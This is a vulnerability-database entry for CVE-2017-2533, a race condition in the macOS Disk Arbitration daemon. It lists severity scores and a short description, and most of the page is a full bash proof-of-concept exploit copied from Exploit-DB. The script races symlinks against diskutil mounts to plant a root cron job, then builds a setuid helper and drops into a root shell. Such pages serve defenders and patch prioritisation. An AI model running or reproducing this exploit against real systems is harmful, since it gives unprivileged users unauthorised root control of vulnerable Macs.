CVE-2017-2533

high
Published 2017-05-22 · Modified 2026-05-13
CVSS v3
7.0
CVSS:3.0/AV:L/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H
CVSS v4
— (not yet in upstream)
VIR risk
8.0

Description

An issue was discovered in certain Apple products. macOS before 10.12.5 is affected. The issue involves the "DiskArbitration" component. A race condition allows attackers to execute arbitrary code in a privileged context via a crafted app.

Predictions

Exploit likelihood
69%
Patch ETA
—

Heuristic predictions, AS-IS, for prioritization only.

Mitigations

No mitigations published for this CVE yet.

Exploits

Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.

Exploit-DB

EDB-42146 local macos verified bash · 2 KB
phoenhex · 2017-06-09

Apple macOS - Disk Arbitration Daemon Race Condition

Bash exploit. Source: Exploit-DB
#!/bin/bash

# Sources: 
# https://raw.githubusercontent.com/phoenhex/files/master/pocs/poc-mount.sh
# https://phoenhex.re/2017-06-09/pwn2own-diskarbitrationd-privesc

if ! security authorize system.volume.internal.mount &>/dev/null; then
  echo >&2 "Cannot acquire system.volume.internal.mount right. This will not work."
  exit 1
fi

TARGET=/private/var/at
SUBDIR=tabs
DISK=/dev/disk0s1

TMPDIR=/tmp/pwn
mkdir -p $TMPDIR
cd $TMPDIR

cat << EOF > boom.c
#include <assert.h>
#include <stdlib.h>
#include <unistd.h>
int main(int argc, char ** argv) {
  assert(argc == 2);
  setuid(0);
  setgid(0);
  system(argv[1]);
}
EOF
clang boom.c -o _boom || exit 1

race_link() {
  mkdir -p mounts

  while true; do
    ln -snf mounts link
    ln -snf $TARGET link
  done
}

race_mount() {
  while ! df -h | grep $TARGET >/dev/null; do
    while df -h | grep $DISK >/dev/null; do
      diskutil umount $DISK &>/dev/null
    done
    while ! df -h | grep $DISK >/dev/null; do
      diskutil mount -mountPoint $TMPDIR/link/$SUBDIR $DISK &>/dev/null
    done
  done
}

cleanup() {
  echo "Killing child process $PID and cleaning up tmp dir"
  kill -9 $PID
  rm -rf $TMPDIR
}

if df -h | grep $DISK >/dev/null; then
  echo >&2 "$DISK already mounted. Exiting."
  exit 1
fi

race_link &
PID=$!
trap cleanup EXIT
echo "Just imagine having that root shell. It's gonna be legen..."
race_mount

echo "wait for it..."
CMD="cp $TMPDIR/_boom $TMPDIR/boom; chmod u+s $TMPDIR/boom"
rm -f /var/at/tabs/root
echo "* * * * *" "$CMD" > /var/at/tabs/root

while ! [ -e $TMPDIR/boom ]; do
  sleep 1
done

echo "dary!"
kill -9 $PID
sleep 0.1
$TMPDIR/boom "rm /var/at/tabs/root"
$TMPDIR/boom "umount -f $DISK"
$TMPDIR/boom "rm -rf $TMPDIR; cd /; su"

OS impact

macOS (1 release affected)
Version    Status      Fixed in
—          Affected    —

References

CWEs

CWE-362
